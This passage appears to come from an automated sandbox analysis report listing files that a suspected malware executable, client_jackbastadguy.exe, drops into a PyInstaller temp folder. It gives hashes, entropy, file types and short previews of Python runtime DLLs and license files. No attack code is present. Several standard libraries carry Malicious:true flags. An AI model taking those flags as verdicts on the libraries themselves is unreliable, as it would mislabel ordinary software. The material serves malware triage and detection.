                                                                                                                                                                                                                                                  MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                  SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                  SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                  SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\licenses\LICENSE.APACHE

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11360
                                                                                                                                                                                                                                                  Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                  MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                  SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                  SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                  SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\licenses\LICENSE.BSD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1532
                                                                                                                                                                                                                                                  Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                  MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                  SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                  SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                  SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8292864
                                                                                                                                                                                                                                                  Entropy (8bit):6.493076254122072
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
                                                                                                                                                                                                                                                  MD5:34293B976DA366D83C12D8EE05DE7B03
                                                                                                                                                                                                                                                  SHA1:82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
                                                                                                                                                                                                                                                  SHA-256:A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
                                                                                                                                                                                                                                                  SHA-512:0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.R\..n"......~Z.......................................~...........`...........................................x.X.....x...............y...............~.......o.T.....................o.(...p.o.@............p\.8............................text....Q\......R\................. ..`.rdata..P9...p\..:...V\.............@..@.data... >....x.......x.............@....pdata........y.......y.............@..@.reloc........~.......}.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\libcrypto-1_1.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3439512
                                                                                                                                                                                                                                                  Entropy (8bit):6.096012359425593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:kw+jlHDGV+EafwAlViBksm1CPwDv3uFfJ1:1slHDG2fwAriXm1CPwDv3uFfJ1
                                                                                                                                                                                                                                                  MD5:AB01C808BED8164133E5279595437D3D
                                                                                                                                                                                                                                                  SHA1:0F512756A8DB22576EC2E20CF0CAFEC7786FB12B
                                                                                                                                                                                                                                                  SHA-256:9C0A0A11629CCED6A064932E95A0158EE936739D75A56338702FED97CB0BAD55
                                                                                                                                                                                                                                                  SHA-512:4043CDA02F6950ABDC47413CFD8A0BA5C462F16BCD4F339F9F5A690823F4D0916478CAB5CAE81A3D5B03A8A196E17A716B06AFEE3F92DEC3102E3BBC674774F2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ......$...................................................5......4...`..........................................x/..h...:4.@....p4.|....p2.8....\4.......4..O....,.8...........................`.,.@............04..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......p2.......1.............@..@.idata..^#...04..$....3.............@..@.00cfg..u....`4.......3.............@..@.rsrc...|....p4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\libffi-7.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32792
                                                                                                                                                                                                                                                  Entropy (8bit):6.3566777719925565
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                                                                                                                                                  MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                                                                                                                                                  SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                                                                                                                                                  SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                                                                                                                                                  SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\libssl-1_1.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):698784
                                                                                                                                                                                                                                                  Entropy (8bit):5.533720236597082
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:waXWJ978LddzAPcWTWxYx2OCf2QmAr39Zu+DIpEpXKWRq0qwMUxQU2lvz:dddzAjKnD/QGXKzpwMUCU2lvz
                                                                                                                                                                                                                                                  MD5:DE72697933D7673279FB85FD48D1A4DD
                                                                                                                                                                                                                                                  SHA1:085FD4C6FB6D89FFCC9B2741947B74F0766FC383
                                                                                                                                                                                                                                                  SHA-256:ED1C8769F5096AFD000FC730A37B11177FCF90890345071AB7FBCEAC684D571F
                                                                                                                                                                                                                                                  SHA-512:0FD4678C65DA181D7C27B19056D5AB0E5DD0E9714E9606E524CDAD9E46EC4D0B35FE22D594282309F718B30E065F6896674D3EDCE6B3B0C8EB637A3680715C2C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .....<...T......<................................................[....`.........................................00...N..HE..........s.......|M..............h... ...8...............................@............0..H............................text....:.......<.................. ..`.rdata..:....P...0...@..............@..@.data...AM.......D...p..............@....pdata..dV.......X..................@..@.idata..PW...0...X..................@..@.00cfg..u............d..............@..@.rsrc...s............f..............@..@.reloc..a............n..............@..B................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\pyexpat.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):198568
                                                                                                                                                                                                                                                  Entropy (8bit):6.360283939217406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:rkPTemtXBsiLC/QOSL6XZIMuPbBV3Dy9zeL9ef93d1BVdOd8dVyio0OwUpz1RPoi:AKmVG/pxIMuPbBFEFDBwpp2W
                                                                                                                                                                                                                                                  MD5:6BC89EBC4014A8DB39E468F54AAAFA5E
                                                                                                                                                                                                                                                  SHA1:68D04E760365F18B20F50A78C60CCFDE52F7FCD8
                                                                                                                                                                                                                                                  SHA-256:DBE6E7BE3A7418811BD5987B0766D8D660190D867CD42F8ED79E70D868E8AA43
                                                                                                                                                                                                                                                  SHA-512:B7A6A383EB131DEB83EEE7CC134307F8545FB7D043130777A8A9A37311B64342E5A774898EDD73D80230AB871C4D0AA0B776187FA4EDEC0CCDE5B9486DBAA626
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...........6...k.....k.....k.....k.....o............|.o.....o.....o.Z...o.....Rich..................PE..d....K.b.........." ... ............0................................................0....`.........................................`...P................................)..........@6..T............................5..@............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\python3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):64936
                                                                                                                                                                                                                                                  Entropy (8bit):6.1037683983631625
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:kD8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqL:kDwewnvtjnsfwaVISQ0a7SydEnn
                                                                                                                                                                                                                                                  MD5:07BD9F1E651AD2409FD0B7D706BE6071
                                                                                                                                                                                                                                                  SHA1:DFEB2221527474A681D6D8B16A5C378847C59D33
                                                                                                                                                                                                                                                  SHA-256:5D78CD1365EA9AE4E95872576CFA4055342F1E80B06F3051CF91D564B6CD09F5
                                                                                                                                                                                                                                                  SHA-512:DEF31D2DF95CB7999CE1F55479B2FF7A3CB70E9FC4778FC50803F688448305454FBBF82B5A75032F182DFF663A6D91D303EF72E3D2CA9F2A1B032956EC1A0E2A
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..A.e.A.e.A.e.%}m.@.e.%}e.@.e.%}..@.e.%}g.@.e.RichA.e.........................PE..d....K.b.........." ... ..................................................................`.........................................`...`................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\python310.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4493736
                                                                                                                                                                                                                                                  Entropy (8bit):6.465157771728023
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:5vL1txd/8sCmiAiPw+RxtLzli0Im3wOc+28Ivu31WfbF9PtF+FNDHaSclAaBlh7y:Dw7Ad07RmodacSeSHCMTbSp4PS
                                                                                                                                                                                                                                                  MD5:C80B5CB43E5FE7948C3562C1FFF1254E
                                                                                                                                                                                                                                                  SHA1:F73CB1FB9445C96ECD56B984A1822E502E71AB9D
                                                                                                                                                                                                                                                  SHA-256:058925E4BBFCB460A3C00EC824B8390583BAEF0C780A7C7FF01D43D9EEC45F20
                                                                                                                                                                                                                                                  SHA-512:FAA97A9D5D2A0BF78123F19F8657C24921B907268938C26F79E1DF6D667F7BEE564259A3A11022E8629996406CDA9FA00434BB2B1DE3E10B9BDDC59708DBAD81
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.o...o...o.......m.......b.......c.......g.......k...f.`.u......f...o...3..............n.......n.......n...Richo...................PE..d....K.b.........." ... ..#...!.....|!........................................E.....{.D...`..........................................G=.......>.|.....E.......B......hD..)....E..t...Q%.T...........................`P%.@.............#.0............................text.....#.......#................. ..`.rdata...\....#..^....#.............@..@.data... ....0>.......>.............@....pdata........B.. ....A.............@..@PyRuntim`.....D.......C.............@....rsrc.........E.......C.............@..@.reloc...t....E..v....C.............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\select.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29096
                                                                                                                                                                                                                                                  Entropy (8bit):6.4767692602677815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:rPxHeWt+twhCBsHqF2BMXR6VIS7GuIYiSy1pCQkyw24i/8E9VFL2Ut8JU:ZeS+twhC6HqwmYVIS7GjYiSyv7VeEdH
                                                                                                                                                                                                                                                  MD5:ADC412384B7E1254D11E62E451DEF8E9
                                                                                                                                                                                                                                                  SHA1:04E6DFF4A65234406B9BC9D9F2DCFE8E30481829
                                                                                                                                                                                                                                                  SHA-256:68B80009AB656FFE811D680585FAC3D4F9C1B45F29D48C67EA2B3580EC4D86A1
                                                                                                                                                                                                                                                  SHA-512:F250F1236882668B2686BD42E1C334C60DA7ABEC3A208EBEBDEE84A74D7C4C6B1BC79EED7241BC7012E4EF70A6651A32AA00E32A83F402475B479633581E0B07
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{?t..Q'..Q'..Q'.b.'..Q'.`P&..Q'.`T&..Q'.`U&..Q'.`R&..Q'.`P&..Q'..P'..Q'5hP&..Q'.`\&..Q'.`Q&..Q'.`.'..Q'.`S&..Q'Rich..Q'........................PE..d....K.b.........." ... .....2......................................................l.....`..........................................@..L....@..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata..H....0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:pip.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11358
                                                                                                                                                                                                                                                  Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                                  MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                                  SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                                  SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                                  SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4648
                                                                                                                                                                                                                                                  Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                                  MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                                  SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                                  SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                                  SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2518
                                                                                                                                                                                                                                                  Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                                  MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                                  SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                                  SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                                  SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):91
                                                                                                                                                                                                                                                  Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                                  MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                                  SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                                  SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
